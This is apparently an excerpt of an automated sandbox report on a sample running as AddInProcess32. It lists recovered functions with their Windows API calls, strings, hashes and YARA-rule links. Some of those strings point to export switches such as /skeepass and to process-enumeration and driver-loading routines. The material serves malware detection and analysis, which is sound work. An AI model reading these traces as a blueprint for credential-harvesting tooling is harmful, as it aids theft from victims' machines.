                                                                                                  • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                  • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                  • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                  • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                  • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                  • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                  • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                  • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                    • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                    • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                  • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                  • API String ID: 4054529287-3175352466
                                                                                                  • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                  • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                  • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                  • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                  Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                  • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                  • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                  • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                  • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                  • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                  • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                  • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                  • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                  • API String ID: 667068680-2887671607
                                                                                                  • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                  • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                  • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                  • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                  Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _snwprintf$memset$wcscpy
                                                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                  • API String ID: 2000436516-3842416460
                                                                                                  • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                  • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                  • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                  • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                  Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                    • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                    • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                    • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                    • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                  • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                  • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                  • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                  • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                  • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                  • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                  • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                  • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                  • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                  • String ID:
                                                                                                  • API String ID: 1043902810-0
                                                                                                  • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                  • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                  • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                  • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                  Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                                  • _snwprintf.MSVCRT ref: 0044488A
                                                                                                  • wcscpy.MSVCRT ref: 004448B4
                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                  • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                  • API String ID: 2899246560-1542517562
                                                                                                  • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                  • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                  • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                  • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                  Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                  • memset.MSVCRT ref: 004085CF
                                                                                                  • memset.MSVCRT ref: 004085F1
                                                                                                  • memset.MSVCRT ref: 00408606
                                                                                                  • strcmp.MSVCRT ref: 00408645
                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                  • memset.MSVCRT ref: 0040870E
                                                                                                  • strcmp.MSVCRT ref: 0040876B
                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                  • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                  • String ID: ---
                                                                                                  • API String ID: 3437578500-2854292027
                                                                                                  • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                  • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                  • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                  • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                  Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0041087D
                                                                                                  • memset.MSVCRT ref: 00410892
                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                  • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                  • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                  • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                  • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                  • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                  • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                  • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                  • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                  • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                  • String ID:
                                                                                                  • API String ID: 1010922700-0
                                                                                                  • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                  • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                  • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                  • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                  Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                  • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                  • malloc.MSVCRT ref: 004186B7
                                                                                                  • free.MSVCRT ref: 004186C7
                                                                                                  • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                  • free.MSVCRT ref: 004186E0
                                                                                                  • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                  • malloc.MSVCRT ref: 004186FE
                                                                                                  • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                  • free.MSVCRT ref: 00418716
                                                                                                  • free.MSVCRT ref: 0041872A
                                                                                                  • free.MSVCRT ref: 00418749
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: free$FullNamePath$malloc$Version
                                                                                                  • String ID: |A
                                                                                                  • API String ID: 3356672799-1717621600
                                                                                                  • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                  • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                  • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                  • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                  Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmp
                                                                                                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                  • API String ID: 2081463915-1959339147
                                                                                                  • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                  • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                  • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                  • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                  Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                  • API String ID: 2012295524-70141382
                                                                                                  • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                  • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                  • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                  • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                  Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                  • API String ID: 667068680-3953557276
                                                                                                  • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                  • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                  • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                  • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                  Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetDC.USER32(00000000), ref: 004121FF
                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                  • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                  • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                  • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                  • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                    • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                    • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                    • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                  • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                  • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                  • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                  • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 1700100422-0
                                                                                                  • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                  • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                  • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                  • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                  Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                  • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                  • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                  • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                  • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                  • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                  • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                  • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                  • String ID:
                                                                                                  • API String ID: 552707033-0
                                                                                                  • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                  • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                  • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                  • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                  Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                    • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                    • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                  • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                  • strchr.MSVCRT ref: 0040C140
                                                                                                  • strchr.MSVCRT ref: 0040C151
                                                                                                  • _strlwr.MSVCRT ref: 0040C15F
                                                                                                  • memset.MSVCRT ref: 0040C17A
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                  • String ID: 4$h
                                                                                                  • API String ID: 4066021378-1856150674
                                                                                                  • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                  • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                  • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
